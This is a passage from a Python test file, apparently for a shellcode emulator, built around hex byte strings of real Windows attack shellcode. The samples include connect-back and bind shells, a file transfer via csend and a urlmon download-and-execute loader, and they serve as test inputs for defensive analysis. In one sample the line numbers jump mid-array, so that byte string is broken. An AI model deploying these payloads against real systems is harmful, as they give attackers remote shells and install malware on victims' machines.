401 | shellcode += b"\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x20\x00\x00\x00\x30\x00\x2d" # 0x02c0 ........ . ...0.-" 402 | shellcode += b"\x00\x00\x00\x00\x00\x88\x2a\x0c\x00\x02\x00\x00\x00\x01\x00\x00" # 0x02d0 ......*. ........" 403 | shellcode += b"\x00\x28\x8c\x0c\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00" # 0x02e0 .(...... ........" 404 | shellcode += b"\x00" 405 | 406 | self.runShellcode(shellcode, 10) 407 | 408 | def testShellcode11(self): 409 | """ 410 | Brightstor discovery 411 | """ 412 | 413 | shellcode = b"\x41\x41\x41\x41\x41\x41\x41\x41\xeb\x06\x41\x41\x14\x57\x80\x23" # 0x0030 AAAAAAAA ..AA.W.#" 414 | shellcode += b"\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x25\x01\x80\x34\x0b\x99\xe2\xfa" # 0x0040 ..[K3.f. %..4...." 415 | shellcode += b"\xeb\x05\xe8\xeb\xff\xff\xff\x70\x62\x99\x99\x99\xc6\xfd\x38\xa9" # 0x0050 .......p b.....8." 416 | shellcode += b"\x99\x99\x99\x12\xd9\x95\x12\xe9\x85\x34\x12\xf1\x91\x12\x6e\xf3" # 0x0060 ........ .4....n." 417 | shellcode += b"\x9d\xc0\x71\x02\x99\x99\x99\x7b\x60\xf1\xaa\xab\x99\x99\xf1\xee" # 0x0070 ..q....{ `......." 418 | shellcode += b"\xea\xab\xc6\xcd\x66\x8f\x12\x71\xf3\x9d\xc0\x71\x1b\x99\x99\x99" # 0x0080 ....f..q ...q...." 419 | shellcode += b"\x7b\x60\x18\x75\x09\x98\x99\x99\xcd\xf1\x98\x98\x99\x99\x66\xcf" # 0x0090 {`.u.... ......f." 420 | shellcode += b"\x89\xc9\xc9\xc9\xc9\xd9\xc9\xd9\xc9\x66\xcf\x8d\x12\x41\xf1\x59" # 0x00a0 ........ .f...A.Y" 421 | shellcode += b"\xec\xe3\xa0\xf1\x9b\x99\x66\x63\x12\x55\xf3\x89\xc8\xca\x66\xcf" # 0x00b0 ......fc .U....f." 422 | shellcode += b"\x81\x1c\x59\xec\xd3\xf1\xfa\xf4\xfd\x99\x10\xff\xa9\x1a\x75\xcd" # 0x00c0 ..Y..... ......u." 423 | shellcode += b"\x14\xa5\xbd\xf3\x8c\xc0\x32\x7b\x64\x5f\xdd\xbd\x89\xdd\x67\xdd" # 0x00d0 ......2{ d_....g." 424 | shellcode += b"\xbd\xa4\x10\xc5\xbd\xd1\x10\xc5\xbd\xd5\x10\xc5\xbd\xc9\x14\xdd" # 0x00e0 ........ ........" 425 | shellcode += b"\xbd\x89\xcd\xc9\xc8\xc8\xc8\xf3\x98\xc8\xc8\x66\xef\xa9\xc8\x66" # 0x00f0 ........ 
...f...f" 426 | shellcode += b"\xcf\x9d\x12\x55\xf3\x66\x66\xa8\x66\xcf\x91\xca\x66\xcf\x85\x66" # 0x0100 ...U.ff. f...f..f" 427 | shellcode += b"\xcf\x95\xc8\xcf\x12\xdc\xa5\x12\xcd\xb1\xe1\x9a\x4c\xcb\x12\xeb" # 0x0110 ........ ....L..." 428 | shellcode += b"\xb9\x9a\x6c\xaa\x50\xd0\xd8\x34\x9a\x5c\xaa\x42\x96\x27\x89\xa3" # 0x0120 ..l.P..4 .\.B.'.." 429 | shellcode += b"\x4f\xed\x91\x58\x52\x94\x9a\x43\xd9\x72\x68\xa2\x86\xec\x7e\xc3" # 0x0130 O..XR..C .rh...~." 430 | shellcode += b"\x12\xc3\xbd\x9a\x44\xff\x12\x95\xd2\x12\xc3\x85\x9a\x44\x12\x9d" # 0x0140 ....D... .....D.." 431 | shellcode += b"\x12\x9a\x5c\x32\xc7\xc0\x5a\x71\x99\x66\x66\x66\x17\xd7\x97\x75" # 0x0150 ..\2..Zq .fff...u" 432 | shellcode += b"\xeb\x67\x2a\x8f\x34\x40\x9c\x57\x76\x57\x79\xf9\x52\x74\x65\xa2" # 0x0160 .g*.4@.W vWy.Rte." 433 | shellcode += b"\x40\x90\x6c\x34\x75\x60\x33\xf9\x7e\xe0\x5f\xe0\x41\x41\x41\x41" # 0x0170 @.l4u`3. ~._.AAAA" 434 | 435 | self.runShellcode(shellcode, 11) 436 | 437 | def testShellcode12(self): 438 | """ 439 | Amberg 440 | """ 441 | 442 | shellcode = b"\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\xeb\x02\xeb\x6b" 443 | shellcode += b"\xe8\xf9\xff\xff\xff\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" 444 | shellcode += b"\x8b\x54\x05\x78\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x32" 445 | shellcode += b"\x49\x8b\x34\x8b\x03\xf5\x33\xff\xfc\x33\xc0\xac\x3a\xc4\x74\x07" 446 | shellcode += b"\xc1\xcf\x0d\x03\xf8\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" 447 | shellcode += b"\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5" 448 | shellcode += b"\xeb\x02\x33\xc0\x5f\x5e\x5d\x5b\x89\x44\x24\x04\x8b\x04\x24\x89" 449 | shellcode += b"\x44\x24\x08\x8b\x44\x24\x04\x83\xc4\x08\xc3\x5e\x6a\x30\x59\x64" 450 | shellcode += b"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x7b\x08\x83\xec\x1c" 451 | shellcode += b"\x8b\xec\x33\xc0\x50\x68\x2e\x65\x78\x65\x89\x65\x14\x57\x68\xea" 452 | shellcode += 
b"\x49\x8a\xe8\xff\xd6\x6a\x06\xff\x75\x14\xff\xd0\x89\x45\x04\x57" 453 | shellcode += b"\x68\xdb\x8a\x23\xe9\xff\xd6\x89\x45\x0c\x57\x68\x8e\x4e\x0e\xec" 454 | shellcode += b"\xff\xd6\x33\xc9\x66\xb9\x6c\x6c\x51\x68\x33\x32\x2e\x64\x68\x77" 455 | shellcode += b"\x73\x32\x5f\x54\xff\xd0\x8b\xd8\x53\x68\xb6\x19\x18\xe7\xff\xd6" 456 | shellcode += b"\x89\x45\x10\x53\x68\xe7\x79\xc6\x79\xff\xd6\x89\x45\x18\x53\x68" 457 | shellcode += b"\x6e\x0b\x2f\x49\xff\xd6\x6a\x06\x6a\x01\x6a\x02\xff\xd0\x89\x45" 458 | shellcode += b"\x08\x33\xc0\x50\x50\x50\xb8\x02\xff\xab\xfc\x80\xf4\xff\x50\x8b" 459 | shellcode += b"\xc4\x6a\x10\x50\xff\x75\x08\x53\x68\xa4\x1a\x70\xc7\xff\xd6\xff" 460 | shellcode += b"\xd0\x58\x53\x68\xa4\xad\x2e\xe9\xff\xd6\x6a\x10\xff\x75\x08\xff" 461 | shellcode += b"\xd0\x33\xc0\x50\x50\xff\x75\x08\x53\x68\xe5\x49\x86\x49\xff\xd6" 462 | shellcode += b"\xff\xd0\x8b\x4d\x08\x89\x45\x08\x51\xff\x55\x18\x81\xc4\xfc\xfe" 463 | shellcode += b"\xff\xff\x8b\xdc\x33\xc9\x51\xb1\xff\x51\x53\xff\x75\x08\xff\x55" 464 | shellcode += b"\x10\x85\xc0\x7e\x0a\x50\x53\xff\x75\x04\xff\x55\x0c\xeb\xe5\xff" 465 | shellcode += b"\x75\x08\xff\x55\x18\x57\x68\x5b\x4c\x1a\xdd\xff\xd6\xff\x75\x04" 466 | shellcode += b"\xff\xd0\x33\xc0\x50\xff\x75\x14\x57\x68\x98\xfe\x8a\x0e\xff\xd6" 467 | shellcode += b"\xff\xd0\x57\x68\xef\xce\xe0\x60\xff\xd6\xff\xd0\x65\x65\x65\x65" 468 | 469 | self.runShellcode(shellcode, 12) 470 | 471 | def testShellcode13(self): 472 | """ 473 | Lindau - linkbot connectback version 474 | """ 475 | 476 | shellcode = b"\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x15\xb9\x8b\xe6\x13\x41\x81" 477 | shellcode += b"\xf1\x39\xe6\x13\x41\x5e\x80\x74\x31\xff\x17\xe2\xf9\xeb\x05\xe8" 478 | shellcode += b"\xe6\xff\xff\xff\x24\xcc\x73\x9c\x54\x27\x9c\x57\x1b\x9c\x67\x0b" 479 | shellcode += b"\xba\x9c\x6f\x1f\xff\x52\x17\x17\x17\x44\x41\x9c\x48\x2b\x9c\x4b" 480 | shellcode += b"\x2c\x6f\x14\xc8\x44\x9c\x4c\x37\x14\xc8\x44\x94\xd4\x13\x9c\x24" 481 | shellcode += 
b"\x14\xe0\x24\xde\xbb\x25\xdf\xd6\xd6\x12\x93\xd7\x62\xe1\x3c\xdd" 482 | shellcode += b"\x62\xfe\x4f\x3c\xcf\xc6\xfc\x49\x14\x49\x33\x14\xc8\x71\x9c\x1c" 483 | shellcode += b"\x9c\x49\x0b\x14\xc8\x9c\x13\x9c\x14\xd0\x49\x4c\xe8\xf7\x49\x7f" 484 | shellcode += b"\x24\x25\x17\x17\x7f\x60\x64\x25\x48\x43\xad\x85\x79\x13\x93\xe8" 485 | shellcode += b"\xc1\x9c\xef\x96\xfb\x17\x15\x17\x17\x9c\xfb\x44\x7d\x16\x7d\x15" 486 | shellcode += b"\xad\x94\x44\x94\x17\xe8\xc1\x44\x44\x7f\x29\x38\xce\xe9\x7f\x15" 487 | shellcode += b"\x17\x2b\x0e\x9c\xc3\x9c\xcf\x7d\x07\x45\x44\xad\x74\x27\x77\x4d" 488 | shellcode += b"\xe8\xc1\x47\xa3\x15\x47\x42\x44\xad\x17\x4f\x77\xf5\xe8\xc1\xa8" 489 | shellcode += b"\xbb\xbb\x11\x92\xe8\xf2\x6c\x79\x73\x65\x7a\x6c\x64\x6c\x6a\x64" 490 | shellcode += b"\x71\x66\x70\x6c\x62\x65\x7a\x71\x79\x71\x76\x76\x79\x6a\x71\x77" 491 | shellcode += b"\x65\x63\x7a\x75\x6f\x64\x62\x67\x69\x69\x68\x78\x65\x71\x7a\x6b" 492 | shellcode += b"\x75\x6f\x75\x67\x76\x72\x66\x67\x6b\x75\x6f\x6d\x6c\x79\x79\x67" 493 | shellcode += b"\x77\x78\x6f\x6d\x61\x6c\x72\x6c\x73\x70\x6a\x63\x64\x73\x6c\x6c" 494 | shellcode += b"\x73\x69\x67\x67\x6b\x66\x73\x71\x6c\x62\x6a\x6c\x71\x63\x76\x73" 495 | shellcode += b"\x6e\x78\x6f\x71\x72\x78\x6f\x76\x63\x73\x75\x70\x70\x6e\x62\x61" 496 | shellcode += b"\x76\x72\x70\x66\x63\x61\x6a\x66\x67\x76\x68\x76\x71\x7a\x63\x62" 497 | shellcode += b"\x7a\x63\x66\x65\x78\x6f\x6e\x68\x68\x61\x70\x66\x6a\x78\x67\x72" 498 | shellcode += b"\x6d\x68\x70\x6d\x75\x6c\x75\x62\x6d\x71\x7a\x72\x6d\x76\x63\x76" 499 | shellcode += b"\x73\x70\x6a\x79\x68\x61\x62\x63\x76\x76\x71\x68\x78\x63\x6b\x6f" 500 | shellcode += b"\x7a\x6a\x78\x68\x70\x6f\x76\x63\x66\x74\x61\x74\x71\x61\x66\x62" 501 | shellcode += b"\x74\x68\x67\x75\x61\x74\x72\x75\x6a\x68\x75\x63\x69\x72\x62\x6b" 502 | shellcode += b"\x6a\x67\x64\x70\x6c\x78\x67\x61\x71\x66\x7a\x67\x67\x71\x63\x6a" 503 | shellcode += b"\x62\x69\x79\x6a\x71\x76\x77\x66\x67\x7a\x74\x69\x72\x77\x6f\x63" 504 | shellcode 
+= b"\x79\x7a\x8b\x45\x30\x05\x24\xfb\xff\xff\xff\xe0\xeb\xf4\x70\x75" 505 | shellcode += b"\x0b\x0b\x1b\x00\x6b\x6a\x69\x68\x74\x70\x6f\x66\x68\x6c\x65\x65" 506 | shellcode += b"\x77\x72\x61\x79\x78\x6b\x61\x76\x78\x77\x64\x71\x61\x71\x7a\x76" 507 | shellcode += b"\x77\x67\x62\x77\x65\x67\x6f\x66\x74\x74\x73\x6d\x77\x6f\x75\x6e" 508 | shellcode += b"\x62\x6d\x6f\x64\x73\x6d\x78\x6c\xeb\x06\x6d\x64\x59\x1c\x00\x01" 509 | shellcode += b"\x8b\x44\x24\xfc\x05\xe0\xfa\xff\xff\xff\xe0\x6d\x75\x6a\x64\x6b" 510 | shellcode += b"\x75\x63\x69\x77\x65\x63\x74\x61\x75\x64\x70\x73\x66\x68\x67\x69" 511 | shellcode += b"\x62\x67\x63\x75\x72\x66\x6a\x6a\x6e\x6e\x78\x72\x78\x66\x5c\x00" 512 | shellcode += b"\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" 513 | shellcode += b"\x00\x00\x00\x00\x01\x00\x00\x00\x68\x1c\x09\x00\x01\x00\x00\x00" 514 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46" 515 | 516 | self.runShellcode(shellcode, 13) 517 | 518 | def testShellcode14(self): 519 | """ 520 | Bremen - linkbot bind version 521 | """ 522 | 523 | shellcode = b"\x90\x90\x90\x90\xeb\x04\xff\xff\xff\xff\x90\x90\x90\x90\x90\x90" 524 | shellcode += b"\x90\x90\xeb\x04\xeb\x04\x90\x90\x90\x90\xeb\x04\xff\xff\xff\xff" 525 | shellcode += b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 526 | shellcode += b"\x90\x90\x90\x90\xeb\x15\xb9\x8b\xe6\x13\x41\x81\xf1\x4d\xe6\x13" 527 | shellcode += b"\x41\x5e\x80\x74\x31\xff\x42\xe2\xf9\xeb\x05\xe8\xe6\xff\xff\xff" 528 | shellcode += b"\x71\x99\x26\xc9\x01\x72\xc9\x02\x4e\xc9\x32\x5e\xef\xc9\x3a\x4a" 529 | shellcode += b"\xaa\x07\x42\x42\x42\x11\x14\xc9\x1d\x7e\xc9\x1e\x79\x3a\x41\x9d" 530 | shellcode += b"\x11\xc9\x19\x62\x41\x9d\x11\xc1\x81\x46\xc9\x71\x41\xb5\x71\x8b" 531 | shellcode += b"\xee\x70\x8a\x83\x83\x47\xc6\x82\x37\xb4\x69\x88\x37\xab\x1a\x69" 532 | shellcode += b"\x9a\x93\xa9\x1c\x41\x1c\x66\x41\x9d\x24\xc9\x49\xc9\x1c\x5e\x41" 533 | shellcode += 
b"\x9d\xc9\x46\xc9\x41\x85\x1c\x19\xbd\xa2\x1c\x2a\x71\x70\x42\x42" 534 | shellcode += b"\x2a\x35\x31\x70\x1d\x16\xf8\xd0\x2c\x46\xc6\xbd\x94\xc9\xba\xc3" 535 | shellcode += b"\xae\x42\x40\x42\x42\xc9\xae\x11\x28\x43\x28\x40\xf8\xc1\x11\xc1" 536 | shellcode += b"\x42\xbd\x94\x11\x11\x11\x2a\x40\x42\xe2\xe1\xc9\x96\xc9\x9a\x28" 537 | shellcode += b"\x52\x10\x11\xf8\x42\xd2\xe4\x80\xbd\x94\x02\x12\x11\xf8\x38\x79" 538 | shellcode += b"\x31\xe3\xbd\x94\x12\x12\x11\xf8\x52\x91\x2b\x42\xbd\x94\xc9\x9a" 539 | shellcode += b"\x71\x82\x12\xf6\x40\x12\x17\x11\xf8\x42\x1a\x22\xa0\xbd\x94\xfd" 540 | shellcode += b"\x97\xa2\x84\x30\xbd\xa7\x6b\x63\x71\x6b\x62\x6e\x66\x66\x69\x64" 541 | shellcode += b"\x6d\x72\x64\x76\x77\x70\x6c\x72\x62\x61\x67\x6c\x66\x63\x62\x65" 542 | shellcode += b"\x76\x63\x77\x7a\x7a\x64\x77\x72\x6e\x61\x78\x71\x6c\x64\x70\x73" 543 | shellcode += b"\x6f\x62\x64\x71\x64\x77\x79\x71\x79\x69\x63\x69\x72\x69\x6b\x69" 544 | shellcode += b"\x75\x66\x64\x69\x73\x73\x62\x72\x6e\x6c\x72\x69\x6b\x72\x6e\x69" 545 | shellcode += b"\x61\x6d\x68\x79\x71\x68\x70\x68\x65\x63\x62\x7a\x74\x78\x72\x75" 546 | shellcode += b"\x6c\x74\x75\x6d\x79\x62\x6b\x67\x6c\x70\x61\x6a\x6b\x73\x75\x71" 547 | shellcode += b"\x61\x6b\x68\x6a\x65\x72\x67\x61\x6d\x72\x6c\x76\x70\x75\x79\x6a" 548 | shellcode += b"\x66\x69\x6f\x68\x7a\x72\x75\x79\x72\x6b\x70\x6e\x61\x6f\x70\x78" 549 | shellcode += b"\x7a\x76\x73\x66\x61\x62\x6e\x6d\x74\x6f\x63\x68\x68\x6a\x69\x63" 550 | shellcode += b"\x79\x64\x67\x62\x7a\x67\x66\x72\x66\x6f\x73\x7a\x6d\x73\x72\x74" 551 | shellcode += b"\x6d\x66\x6e\x6a\x6f\x76\x6a\x6a\x76\x66\x78\x6d\x78\x64\x76\x67" 552 | shellcode += b"\x73\x73\x6c\x64\x72\x66\x6f\x63\x6b\x68\x7a\x6f\x77\x6f\x71\x79" 553 | shellcode += b"\x62\x69\x6d\x77\x70\x73\x7a\x6c\x65\x72\x6c\x73\x61\x6d\x68\x76" 554 | shellcode += b"\x6e\x75\x65\x67\x76\x71\x75\x77\x71\x78\x6c\x6b\x64\x6b\x62\x75" 555 | shellcode += b"\x6d\x65\x8b\x45\x30\x05\x24\xfb\xff\xff\xff\xe0\xeb\xf4\x77\x75" 556 | shellcode 
+= b"\x0b\x0b\x1b\x00\x77\x68\x72\x6e\x70\x76\x6c\x63\x61\x74\x78\x6f" 557 | shellcode += b"\x6a\x6d\x6b\x76\x6c\x6b\x6a\x7a\x63\x66\x63\x76\x64\x68\x75\x76" 558 | shellcode += b"\x79\x73\x78\x6b\x6e\x71\x6f\x7a\x68\x71\x62\x68\x6a\x74\x6b\x6e" 559 | shellcode += b"\x70\x6e\x78\x74\x6c\x77\x6b\x75\xeb\x06\x61\x69\x59\x1c\x00\x01" 560 | shellcode += b"\x8b\x44\x24\xfc\x05\xe0\xfa\xff\xff\xff\xe0\x62\x6c\x77\x66\x6e" 561 | shellcode += b"\x67\x6b\x6b\x62\x61\x6c\x6e\x69\x69\x73\x64\x73\x6d\x73\x61\x6b" 562 | shellcode += b"\x64\x66\x61\x7a\x6c\x71\x74\x70\x61\x61\x74\x66\x69\x78\x5c\x00" 563 | shellcode += b"\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" 564 | shellcode += b"\x00\x00\x00\x00\x01\x00\x00\x00\x68\x1c\x09\x00\x01\x00\x00\x00" 565 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46" 566 | shellcode += b"\x01\x00\x00\x00\x01\x00\x00\x00\x07\x00" 567 | 568 | self.runShellcode(shellcode, 14) 569 | 570 | def testShellcode15(self): 571 | """ 572 | Halle - filetransferr via csend 573 | """ 574 | 575 | shellcode = b"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x02" # 0x0440 ........ ........" 576 | shellcode += b"\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x31\xc9\x66\xb9\x86\x06\x80\x73" # 0x0450 .......[ 1.f....s" 577 | shellcode += b"\x0e\xd4\x43\xe2\xf9\x3d\x8b\xd5\xd4\xd4\x8f\x82\x83\x84\x3c\x67" # 0x0460 ..C..=.. ......++" 647 | shellcode += b"\x2b\x5d\x57\x57\xd5\xd4\xd4\x8c\x5f\x47\x57\xd5\xd4\xd4\x86\xbc" # 0x08c0 +]WW.... _GW....." 648 | shellcode += b"\xd5\xd5\xd4\xd4\xea\x2b\x87\x95\xe9\xd4\xd4\xd4\xd4\xdb\x51\x31" # 0x08d0 .....+.. ......Q1" 649 | shellcode += b"\x2b\x2b\x2b\xbc\xd2\xd4\xd4\xd4\xbc\xd5\xd4\xd4\xd4\xbc\xd6\xd4" # 0x08e0 +++..... ........" 650 | shellcode += b"\xd4\xd4\xea\x2b\x87\x91\xe9\x2b\x2b\x2b\x2b\xdb\x50\x36\x2b\x2b" # 0x08f0 ...+...+ +++.P6++" 651 | shellcode += b"\x2b\x5d\x57\x2c\xd4\xd4\xd4\x83\x84\x87\x59\x47\xab\xd5\xd4\xd4" # 0x0900 +]W,.... ..YG...." 
652 | shellcode += b"\x12\xd6\xc2\x86\x59\x47\x28\xd4\xd4\xd4\xb2\x13\xd6\xd6\xd4\xb2" # 0x0910 ....YG(. ........" 653 | shellcode += b"\x5f\xaf\xdc\xb2\x5d\xae\xd6\x5f\xaf\xd0\x5d\xae\xd0\x86\x5f\x57" # 0x0920 _...].._ ..]..._W" 654 | shellcode += b"\x2c\xd4\xd4\xd4\x84\xea\x2b\x87\x9d\xe9\xd4\xd4\xd4\xd4\xdb\x58" # 0x0930 ,.....+. .......X" 655 | shellcode += b"\x12\x2b\x2b\x2b\x8f\x8c\x8b\x84\x6c\xd4\xc4\xd4\xd4\x3c\x01\xd4" # 0x0940 .+++.... l....<.." 656 | shellcode += b"\xd4\xd4\xe9\xd4\xd4\xd4\xd4\xdb\x50\x3e\x2b\x2b\x2b\x5d\x57\xb4" # 0x0950 ........ P>+++]W." 657 | shellcode += b"\xd5\xd4\xd4\x8c\x3c\xed\xd4\xd4\xd4\x3c\x0c\xd4\xd4\xd4\x3c\x83" # 0x0960 ....<... .<....<." 658 | shellcode += b"\xd4\xd4\xd4\x3c\xcb\xd5\xd4\xd4\x17\x5f\x57\x2c\xd4\xd4\xd4\x84" # 0x0970 ...<.... ._W,...." 659 | shellcode += b"\xea\x2b\x87\x81\x5f\x57\x7f\xd5\xd4\xd4\x94\x5d\x57\x7f\xd5\xd4" # 0x0980 .+.._W.. ...]W..." 660 | shellcode += b"\xd4\xe9\xd1\xd4\xd4\xd4\xdb\x50\xd1\xd4\xd4\xd4\x3d\x96\x2b\x2b" # 0x0990 .......P ....=.++" 661 | shellcode += b"\x2b\x17\xbc\xd4\xd4\xd4\xd4\xbc\xd0\xd4\xd4\xd4\x59\x47\x53\xd5" # 0x09a0 +....... ....YGS." 662 | shellcode += b"\xd4\xd4\x86\x5f\x47\x2c\xd4\xd4\xd4\x86\xea\x2b\x87\x99\xe9\xd5" # 0x09b0 ..._G,.. ...+...." 663 | shellcode += b"\xd4\xd4\xd4\xdb\x58\x64\x2b\x2b\x2b\x17\x83\x82\x5f\x6f\x53\xd5" # 0x09c0 ....Xd++ +..._oS." 664 | shellcode += b"\xd4\xd4\x5f\x67\x5f\xd5\xd4\xd4\xed\x23\x8a\x8b\xdb\x50\xe6\xd4" # 0x09d0 .._g_... .#...P.." 665 | shellcode += b"\xd4\xd4\xbc\xd4\xd4\xd4\xd4\xbc\xd4\xc4\xd4\xd4\x5f\x47\xb4\xd5" # 0x09e0 ........ ...._G.." 666 | shellcode += b"\xd4\xd4\x86\x5f\x47\x2c\xd4\xd4\xd4\x86\xea\x2b\x87\x99\xe9\xd5" # 0x09f0 ..._G,.. ...+...." 667 | shellcode += b"\xd4\xd4\xd4\xdb\x58\xa4\x2b\x2b\x2b\xd5\x57\x5f\xd5\xd4\xd4\x3d" # 0x0a00 ....X.++ +.W_...=" 668 | shellcode += b"\x84\xd4\xd4\xd4\x3c\xba\xd4\xd4\xd4\x84\x5f\x57\x2c\xd4\xd4\xd4" # 0x0a10 ....<... .._W,..." 
669 | shellcode += b"\x84\xea\x2b\x87\x81\x8c\x17\x5d\x13\x84\xea\x2b\x47\x43\xd4\xd4" # 0x0a20 ..+....] ...+GC.." 670 | shellcode += b"\xd4\x8b\x84\x83\xbc\xd4\xd4\xd4\xd4\x84\xea\x2b\x47\x47\xd4\xd4" # 0x0a30 ........ ...+GG.." 671 | shellcode += b"\xd4\x8b\x8b\x8b\x8c\x17\x59\x47\xb0\xd5\xd4\xd4\x86\x59\x47\xb8" # 0x0a40 ......YG .....YG." 672 | shellcode += b"\xd5\xd4\xd4\x86\xea\x2b\x47\x53\xd4\xd4\xd4\x8b\x8b\x5d\x57\xbc" # 0x0a50 .....+GS .....]W." 673 | shellcode += b"\xd5\xd4\xd4\x17\x2b\x67\xbc\xd5\xd4\xd4\x84\xbc\xd5\xd4\xd4\xd4" # 0x0a60 ....+g.. ........" 674 | shellcode += b"\x5f\x47\xb4\xd5\xd4\xd4\x86\xea\x2b\x47\x5b\xd4\xd4\xd4\x8b\x8b" # 0x0a70 _G...... +G[....." 675 | shellcode += b"\x8b\x8b\x3d\x97\x2b\x2b\x2b\x5f\x47\xbc\xd5\xd4\xd4\x86\xea\x2b" # 0x0a80 ..=.+++_ G......+" 676 | shellcode += b"\x47\x5f\xd4\xd4\xd4\x8b\x17\x84\x59\x57\xd8\xd5\xd4\xd4\x84\x59" # 0x0a90 G_...... YW.....Y" 677 | shellcode += b"\x57\xc8\xd5\xd4\xd4\x84\xbc\xd4\xd4\xd4\xd4\xbc\xd4\xd4\xd4\xd4" # 0x0aa0 W....... ........" 678 | shellcode += b"\xbc\xfc\xd4\xd4\xd4\xbc\xd4\xd4\xd4\xd4\xbc\xd4\xd4\xd4\xd4\xbc" # 0x0ab0 ........ ........" 679 | shellcode += b"\xd4\xd4\xd4\xd4\x59\x57\xb8\xd5\xd4\xd4\x84\xbc\xd4\xd4\xd4\xd4" # 0x0ac0 ....YW.. ........" 680 | shellcode += b"\xea\x2b\x47\x38\xd4\xd4\xd4\x8c\x17\x3c\x7d\x2b\x2b\x2b\xbc\xd4" # 0x0ad0 .+G8.... .<}+++.." 681 | shellcode += b"\xd4\xd4\xd4\x2b\x47\x3c\xd4\xd4\xd4\x44\xd4\x00\x5c\x00\x43\x00" # 0x0ae0 ...+G<.. .D..\.C." 682 | shellcode += b"\x24\x00\x5c\x00\x31\x00\x32\x00\x33\x00\x34\x00\x35\x00\x36\x00" # 0x0af0 $.\.1.2. 3.4.5.6." 683 | shellcode += b"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00" # 0x0b00 1.1.1.1. 1.1.1.1." 684 | shellcode += b"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x2e\x00" # 0x0b10 1.1.1.1. 1.1.1..." 685 | shellcode += b"\x64\x00\x6f\x00\x63\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc" # 0x0b20 d.o.c... ........" 
686 | shellcode += b"\x20\x00\x00\x00\x30\x00\x2d\x00\x00\x00\x00\x00\x88\x2a\x0c\x00" # 0x0b30 ...0.-. .....*.." 687 | shellcode += b"\x02\x00\x00\x00\x01\x00\x00\x00\x28\x8c\x0c\x00\x01\x00\x00\x00" # 0x0b40 ........ (......." 688 | shellcode += b"\x07\x00\x00\x00\x00\x00\x00\x00" 689 | 690 | self.runShellcode(shellcode, 15) 691 | 692 | def testShellcode16(self): 693 | """ 694 | Tills neuer 695 | """ 696 | 697 | shellcode = b"\xeb\x54\x8b\x75\x3c\x8b\x74\x35\x78\x03\xf5\x56\x8b\x76\x20\x03" # 0x0020 .T.u<.t5 x..V.v ." 698 | shellcode += b"\xf5\x33\xc9\x49\x41\xad\x33\xdb\x36\x0f\xbe\x14\x28\x38\xf2\x74" # 0x0030 .3.IA.3. 6...(8.t" 699 | shellcode += b"\x08\xc1\xcb\x0d\x03\xda\x40\xeb\xef\x3b\xdf\x75\xe7\x5e\x8b\x5e" # 0x0040 ......@. .;.u.^.^" 700 | shellcode += b"\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd\x8b\x04\x8b\x03" # 0x0050 $..f..K. ^......." 701 | shellcode += b"\xc5\xc3\x75\x72\x6c\x6d\x6f\x6e\x2e\x64\x6c\x6c\x00\x43\x3a\x5c" # 0x0060 ..urlmon .dll.C:\" 702 | shellcode += b"\x55\x2e\x65\x78\x65\x00\x33\xc0\x64\x03\x40\x30\x78\x0c\x8b\x40" # 0x0070 U.exe.3. d.@0x..@" 703 | shellcode += b"\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c" # 0x0080 ..p...@. ...@4.@|" 704 | shellcode += b"\x8b\x40\x3c\x95\xbf\x8e\x4e\x0e\xec\xe8\x84\xff\xff\xff\x83\xec" # 0x0090 .@<...N. ........" 705 | shellcode += b"\x04\x83\x2c\x24\x3c\xff\xd0\x95\x50\xbf\x36\x1a\x2f\x70\xe8\x6f" # 0x00a0 ..,$<... P.6./p.o" 706 | shellcode += b"\xff\xff\xff\x8b\x54\x24\xfc\x8d\x52\xba\x33\xdb\x53\x53\x52\xeb" # 0x00b0 ....T$.. R.3.SSR." 707 | shellcode += b"\x24\x53\xff\xd0\x5d\xbf\x98\xfe\x8a\x0e\xe8\x53\xff\xff\xff\x83" # 0x00c0 $S..]... ...S...." 708 | shellcode += b"\xec\x04\x83\x2c\x24\x62\xff\xd0\xbf\xef\xce\xe0\x60\xe8\x40\xff" # 0x00d0 ...,$b.. ....`.@." 709 | shellcode += b"\xff\xff\x52\xff\xd0\xe8\xd7\xff\xff\xff\x68\x74\x74\x70\x3a\x2f" # 0x00e0 ..R..... 
